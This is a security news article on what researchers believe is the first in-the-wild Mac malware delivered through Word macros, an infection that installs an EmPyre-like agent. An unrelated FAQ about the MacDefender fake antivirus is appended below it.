Mac Malware Reportedly First To Infect Machines Using Macros

Researchers have identified what they believe is the first in-the-wild instance of hackers using malicious macros in Word documents to execute malware on Mac computers, instead of Windows-based machines.


Patrick Wardle, director of research at the cybersecurity company Synack, reported in a blog post this week that multiple Mac security researchers, admins, and malware experts collectively analyzed a newly discovered malicious Word documentwith the file name “ U.S. Allies and Rivals Digest Trump' s Victory - Carnegie Endowment for International Peace.docm” .


Recipients who open this document and choose to enable macros on the resulting pop-up, are infected with embedded python code that is virtually identical to EmPyre, an open source Mac and Linux post-exploitation agent.


Despite serving a legitimate purpose &ndash the automation of tasks &ndash macros are often abused by developers of Windows-based malware, who have long banked on the fact that users either enable macros by default or dismisswarnings to disable them.


Using Word macros as an infection vector exploits the weakest link: humans,” said Wardle, in an email interview with SC Media. “ As operatingsystems and applications become harder to exploit (due to more secure coding practices, built-in exploitation mitigations, etc.), humans remain the constant.


Other reasons macros make popular cyberweapons: they work across platforms, and “ as legitimate functionality, can' t be fixed by a patch from the vendor,” Wardle added.


After performing a systems check for Little Snitch &ndash Mac OS X' s host-based application firewall product &ndash the malware downloads a second-stage component that maintains persistence on infected machines. This component can run a variety of modules that are capable of operating a victim' s webcam, dumping the keychain and viewing a user' s browser history, among other malicious activities.


The command-and-control server from which this persistence module which downloaded is located in Russia and has a reputation for hosting phishing attacks, Wardle continued. (Presumably, phishing is the malicious Word document' s method of distribution.)

Tag : Linux Malware Detect
FAQ
Q
How bad is the Mac malware scare?
A
Windows users are familiar with the fake anti-malware ruse, but this is the first time it's been targeted at the smaller Mac market. CNET tells you what MacDefender is and what it means for Macintosh users.
Q
Does this mean the Mac is not secure?
A
No. It means that criminals who used to focus on Windows machines to reach the most potential victims are now targeting Mac too. Around the same time MacDefender first appeared, a new crimeware kit showed up on criminal underground sites that makes it easy to write botnet malware for Mac OSX, according to security blogger Brian Krebs.
Q
How widespread is the malware?
A
While it's definitely not an epidemic, it does seem to be hitting the radar more than other Mac malware has in the past. Ed Bott at ZDNet reports that an AppleCare support rep told him call volume on the support line was four to five times higher than normal and most of the calls were about the malware.
Q
WHAT ABOUT SENDING FILES TO WINDOWS USERS?
A
Some users choose to run antivirus such as ClamXav on their Mac to scan for Windows viruses (it also scans for Mac threats), so the Mac user can't pass a virus-infected file to a Windows user. However, a more prudent approach is for every Windows user to be protected by their own AV software, to guard against viruses from any source, not just those that might come from a Mac user.
Q
What is the malware?
A
MacDefender, also known as Mac Security and Mac Protector, is a fake antivirus program that is designed to scare people into thinking that their computers are infected with malware and that they have to pay with a credit card to clean the machine up. People get infected with the rogue antivirus programs when they happen to stumble upon Web sites hosting the malware. The malicious sites are created solely to distribute malware and they are search engine optimized so they will appear high up in search results.